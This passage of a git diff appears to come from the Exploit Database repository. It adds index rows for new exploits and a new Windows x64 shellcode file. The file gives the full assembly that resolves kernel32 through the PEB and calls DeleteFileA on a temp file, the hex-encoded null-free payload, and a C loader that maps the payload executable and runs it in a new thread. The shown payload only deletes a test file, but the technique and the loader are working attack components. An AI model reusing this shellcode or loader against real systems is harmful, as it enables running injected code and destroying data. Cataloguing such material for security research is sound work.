Execution",2023-04-25,Or4nG.M4N,webapps,php,,2023-04-25,2023-04-25,0,,,,,, 4480,exploits/php/webapps/4480.pl,"MultiCart 1.0 - Blind SQL Injection",2007-10-02,k1tk4t,webapps,php,,2007-10-01,,1,OSVDB-39897;CVE-2007-5261;OSVDB-39896,,,,, 5166,exploits/php/webapps/5166.html,"MultiCart 2.0 - 'productdetails.php' SQL Injection",2008-02-20,t0pP8uZz,webapps,php,,2008-02-19,2016-11-14,1,OSVDB-41942;CVE-2008-0911,,,,, 16074,exploits/php/webapps/16074.txt,"MultiCMS - Local File Inclusion",2011-01-29,R3VAN_BASTARD,webapps,php,,2011-01-29,2011-01-29,1,,,,,,http://packetstormsecurity.org/files/view/97987/multicms-lfi.txt @@ -29793,6 +29797,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 41413,exploits/php/webapps/41413.rb,"Sophos Web Appliance 4.2.1.3 - block/unblock Remote Command Injection (Metasploit)",2016-12-12,xort,webapps,php,,2017-02-21,2017-07-18,1,CVE-2016-9553,,,,, 40725,exploits/php/webapps/40725.txt,"Sophos Web Appliance 4.2.1.3 - Remote Code Execution",2016-11-07,KoreLogic,webapps,php,,2016-11-07,2016-11-07,1,,,,,, 42012,exploits/php/webapps/42012.txt,"Sophos Web Appliance 4.3.1.1 - Session Fixation",2017-02-28,SlidingWindow,webapps,php,,2017-05-16,2017-07-18,1,CVE-2017-6412,,,,, +51396,exploits/php/webapps/51396.sh,"Sophos Web Appliance 4.3.10.4 - Pre-auth command injection",2023-04-25,"Behnam Abasi Vanda",webapps,php,,2023-04-25,2023-04-25,0,CVE-2023-1671,,,,, 48074,exploits/php/webapps/48074.txt,"SOPlanning 1.45 - 'by' SQL Injection",2020-02-17,J3rryBl4nks,webapps,php,,2020-02-17,2020-02-17,0,,,,,http://www.exploit-db.comsoplanning-1-45.zip, 48089,exploits/php/webapps/48089.txt,"SOPlanning 1.45 - 'users' SQL Injection",2020-02-17,J3rryBl4nks,webapps,php,,2020-02-17,2020-02-17,0,,,,,, 48086,exploits/php/webapps/48086.txt,"SOPlanning 1.45 - Cross-Site Request Forgery (Add User)",2020-02-17,J3rryBl4nks,webapps,php,,2020-02-17,2020-02-17,0,,,,,, @@ -39160,6 +39165,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 8782,exploits/windows/local/8782.txt,"ArcaVir 2009 < 9.4.320X.9 - 'ps_drv.sys' Local Privilege Escalation",2009-05-26,"NT Internals",local,windows,,2009-05-25,,1,OSVDB-54775;CVE-2009-1824,,2009-PsDrv_Exp.zip,,, 12261,exploits/windows/local/12261.rb,"Archive Searcher - '.zip' Local Stack Overflow",2010-04-16,Lincoln,local,windows,,2010-04-15,,1,OSVDB-63810,,,http://www.exploit-db.com/screenshots/misc/screen-shot-2011-01-09-at-50312-pm.png,http://www.exploit-db.comas_2_1.zip, 40335,exploits/windows/local/40335.txt,"ArcServe UDP 6.0.3792 Update 2 Build 516 - Unquoted Service Path Privilege Escalation",2016-09-05,sh4d0wman,local,windows,,2016-09-05,2016-09-05,1,,,,,, +51393,exploits/windows/local/51393.txt,"Arcsoft PhotoStudio 6.0.0.172 - Unquoted Service Path",2023-04-25,msd0pe,local,windows,,2023-04-25,2023-04-25,0,,,,,, 50261,exploits/windows/local/50261.txt,"Argus Surveillance DVR 4.0 - Unquoted Service Path",2021-09-06,"Salman Asad",local,windows,,2021-09-06,2022-08-01,0,,,,,http://www.exploit-db.comDVR_stp.exe, 50130,exploits/windows/local/50130.py,"Argus Surveillance DVR 4.0 - Weak Password Encryption",2021-07-16,"Salman Asad",local,windows,,2021-07-16,2022-08-01,1,,,,,http://www.exploit-db.comDVR_stp.exe, 44169,exploits/windows/local/44169.txt,"Armadito Antivirus 0.12.7.2 - Detection Bypass",2018-02-22,"Souhail Hammou",local,windows,,2018-02-22,2018-02-22,0,CVE-2018-7289,,,,, @@ -40784,6 +40790,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 46972,exploits/windows/local/46972.html,"Nvidia GeForce Experience Web Helper - Command Injection",2019-06-03,"Rhino Security Labs",local,windows,,2019-06-07,2022-11-04,0,CVE-2019‑5678,,,,,https://github.com/RhinoSecurityLabs/CVEs/blob/0e318a283b00cf42ceb8b898e756deb62082c3aa/CVE-2019-5678/CVE%E2%80%912019%E2%80%915678.html 38792,exploits/windows/local/38792.txt,"Nvidia Stereoscopic 3D Driver Service 7.17.13.5382 - Arbitrary Run Key Creation",2015-11-23,"Google Security Research",local,windows,,2015-11-23,2015-11-23,1,CVE-2015-7865;OSVDB-130456,,,,,https://code.google.com/p/google-security-research/issues/detail?id=515 48391,exploits/windows/local/48391.txt,"NVIDIA Update Service Daemon 1.0.21 - 'nvUpdatusService' Unquoted Service Path",2020-04-28,"Roberto Piña",local,windows,,2020-04-28,2020-04-28,0,,,,,, +51389,exploits/windows/local/51389.txt,"OCS Inventory NG 2.3.0.0 - Unquoted Service Path",2023-04-25,msd0pe,local,windows,,2023-04-25,2023-04-25,0,,,,,, 49857,exploits/windows/local/49857.txt,"Odoo 12.0.20190101 - 'nssm.exe' Unquoted Service Path",2021-05-11,1F98D,local,windows,,2021-05-11,2021-05-11,0,,,,,, 49005,exploits/windows/local/49005.txt,"OKI sPSV Port Manager 1.0.41 - 'sPSVOpLclSrv' Unquoted Service Path",2020-11-09,"Julio Aviña",local,windows,,2020-11-09,2020-11-09,0,,,,,, 388,exploits/windows/local/388.c,"OllyDbg 1.10 - Format String",2004-08-10,"Ahmet Cihan",local,windows,,2004-08-09,2016-10-27,1,OSVDB-8408;CVE-2004-0733,,,,http://www.exploit-db.comodbg110.zip, @@ -41491,6 +41498,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50912,exploits/windows/local/50912.py,"Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService)",2022-05-11,"Netanel Cohen",local,windows,,2022-05-11,2022-06-27,1,CVE-2021-44595,,,,, 49101,exploits/windows/local/49101.txt,"Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path",2020-11-25,"Luis Sandoval",local,windows,,2020-11-25,2020-11-25,0,,,,,, 50757,exploits/windows/local/50757.txt,"Wondershare FamiSafe 1.0 - 'FSService' Unquoted Service Path",2022-02-18,"Luis Martínez",local,windows,,2022-02-18,2022-02-18,0,,,,,, +51395,exploits/windows/local/51395.txt,"Wondershare Filmora 12.2.9.2233 - Unquoted Service Path",2023-04-25,msd0pe,local,windows,,2023-04-25,2023-04-25,0,,,,,, 50787,exploits/windows/local/50787.txt,"Wondershare MirrorGo 2.0.11.346 - Insecure File Permissions",2022-02-24,"Luis Martínez",local,windows,,2022-02-24,2022-02-24,0,,,,,, 50756,exploits/windows/local/50756.txt,"Wondershare MobileTrans 3.5.9 - 'ElevationService' Unquoted Service Path",2022-02-18,"Luis Martínez",local,windows,,2022-02-18,2022-02-18,0,,,,,, 40535,exploits/windows/local/40535.txt,"Wondershare PDFelement 5.2.9 - Unquoted Service Path Privilege Escalation",2016-10-14,"Saeed Hasanzadeh",local,windows,,2016-10-17,2016-10-17,0,,,,,http://www.exploit-db.compdfelement_setup_full1042.exe, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 0a5dc19e4..ba383d280 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -930,6 +930,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd 13828,shellcodes/windows/13828.c,"Windows - MessageBoxA() Shellcode (238 bytes)",2010-06-11,RubberDuck,,windows,238,2010-06-10,2018-01-09,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-648.php 14052,shellcodes/windows/14052.c,"Windows - WinExec(cmd.exe) + ExitProcess Shellcode (195 bytes)",2010-06-25,RubberDuck,,windows,195,2010-06-25,2018-01-09,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-662.php 15136,shellcodes/windows/15136.cpp,"Windows/ARM (Mobile 6.5 TR) - Phone Call Shellcode",2010-09-27,"Celil Ünüver",,windows,,2010-09-27,2010-11-06,1,,,,,, +51390,shellcodes/windows/51390.asm,"Windows/x64 - Delete File shellcode / Dynamic PEB method null-free Shellcode",2023-04-25,Nayani,,windows,,2023-04-25,2023-04-25,0,,,,,, 13525,shellcodes/windows_x86/13525.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (29 bytes)",2005-07-26,loco,,windows_x86,29,2005-07-25,,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-388.php 13526,shellcodes/windows_x86/13526.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (31 bytes)",2005-01-26,twoci,,windows_x86,31,2005-01-25,2018-01-21,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-387.php 13527,shellcodes/windows_x86/13527.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (35 bytes)",2005-01-09,oc192,,windows_x86,35,2005-01-08,2018-01-21,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-260.php diff --git a/shellcodes/windows/51390.asm b/shellcodes/windows/51390.asm new file mode 100644 index 000000000..e9beb414b --- /dev/null +++ b/shellcodes/windows/51390.asm @@ -0,0 +1,146 @@ +; Name: Windows/x64 - Delete File shellcode / Dynamic PEB method null-free Shellcode +; Author: Nayani +; Date: 22/04/2023 +; Tested on: Microsoft Windows [Version 10.0.22621 Build 22621] + + +; Description: + +; This an implementation of DeleteFileA Windows api to delete a file in the C:/Windows/Temp/ directory. +; To test this code create a file: +; echo "test" >> C:/Windows/Temp/test.txt +; and then execute the shellcode +; This code uses PEB to resolve kernel32 and find the DeleteFileA function. + + + + + + + +sub rsp, 28h +and rsp, 0fffffffffffffff0h + +xor rdi, rdi +mul rdi +mov r9, gs:[rax+0x60] +mov r9, [r9+0x18] +mov r9, [r9+0x20] +mov r9, [r9] +mov r9, [r9] +mov r9, [r9+0x20] +mov r8, r9 + +; Get kernel32.dll ExportTable Address +mov r9d, [r9+0x3C] +add r9, r8 +xor rcx, rcx +add cx, 0x88ff +shr rcx, 0x8 +mov edx, [r9+rcx] +add rdx, r8 + +; Get &AddressTable from Kernel32.dll ExportTable +xor r10, r10 +mov r10d, [rdx+0x1C] +add r10, r8 + +; Get &NamePointerTable from Kernel32.dll ExportTable +xor r11, r11 +mov r11d, [rdx+0x20] +add r11, r8 + +; Get &OrdinalTable from Kernel32.dll ExportTable +xor r12, r12 +mov r12d, [rdx+0x24] +add r12, r8 + +jmp short name_api + + +getaddr: +pop r9 +pop rcx +xor rax, rax +mov rdx, rsp +push rcx +check_loop: +mov rcx, [rsp] +xor rdi,rdi +mov edi, [r11+rax*4] +add rdi, r8 +mov rsi, rdx +repe cmpsb +je resolver +incloop: +inc rax +jmp short check_loop + + +resolver: +pop rcx +mov ax, [r12+rax*2] +mov eax, [r10+rax*4] +add rax, r8 +push r9 +ret + +name_api: + +; DeleteFileA + +xor rcx, rcx +add cl, 0xC +mov rax, 0x41656CFFFFFFFFFF ;leA +shr rax, 40 +push rax +mov rax, 0x69466574656C6544 ;DeleteFi +push rax +push rcx +call getaddr +mov r14, rax + +; Bool DeleteFileA( +; LPCSTR lpFileName +; ); + +xor rcx, rcx +mul rcx +push rax + +mov rax, 0x7478742E74736574 +push rax +mov rax, 0x2F706D65542F7377 ; ws/temp +push rax +mov rax, 0x6F646E69572F3A43 ; c:/Windo +push rax ; RSP = "test.txt" +mov rcx, rsp ; RCX = "test.txt" +sub rsp, 0x20 +call r14 ;Delete File in C:/Windows/Temp/test.txt +add rsp, 0x20 + + +[!]===================================== POC ========================================= [!] + +#include + + +void main() { + + void* exec; + BOOL rv; + HANDLE th; + DWORD oldprotect = 0; + + + unsigned char payload[] = "\x48\x83\xec\x28\x48\x83\xe4\xf0\x48\x31\xff\x48\xf7\xe7\x65\x4c\x8b\x48\x60\x4d\x8b\x49\x18\x4d\x8b\x49\x20\x4d\x8b\x09\x4d\x8b\x09\x4d\x8b\x49\x20\x4d\x89\xc8\x45\x8b\x49\x3c\x4d\x01\xc1\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x41\x8b\x14\x09\x4c\x01\xc2\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x34\x41\x59\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04\x82\x4c\x01\xc0\x41\x51\xc3\x48\x31\xc9\x80\xc1\x0c\x48\xb8\xff\xff\xff\xff\xff\x6c\x65\x41\x48\xc1\xe8\x28\x50\x48\xb8\x44\x65\x6c\x65\x74\x65\x46\x69\x50\x51\xe8\xa6\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x48\xf7\xe1\x50\x48\xb8\x74\x65\x73\x74\x2e\x74\x78\x74\x50\x48\xb8\x77\x73\x2f\x54\x65\x6d\x70\x2f\x50\x48\xb8\x43\x3a\x2f\x57\x69\x6e\x64\x6f\x50\x48\x89\xe1\x48\x83\xec\x20\x41\xff\xd6\x48\x83\xc4\x20"; + + + unsigned int payload_len = 500; + exec = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); + RtlMoveMemory(exec, payload, payload_len); + rv = VirtualProtect(exec, payload_len, PAGE_EXECUTE_READ, &oldprotect); + th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec, 0, 0, 0); + WaitForSingleObject(th, -1); + +} \ No newline at end of file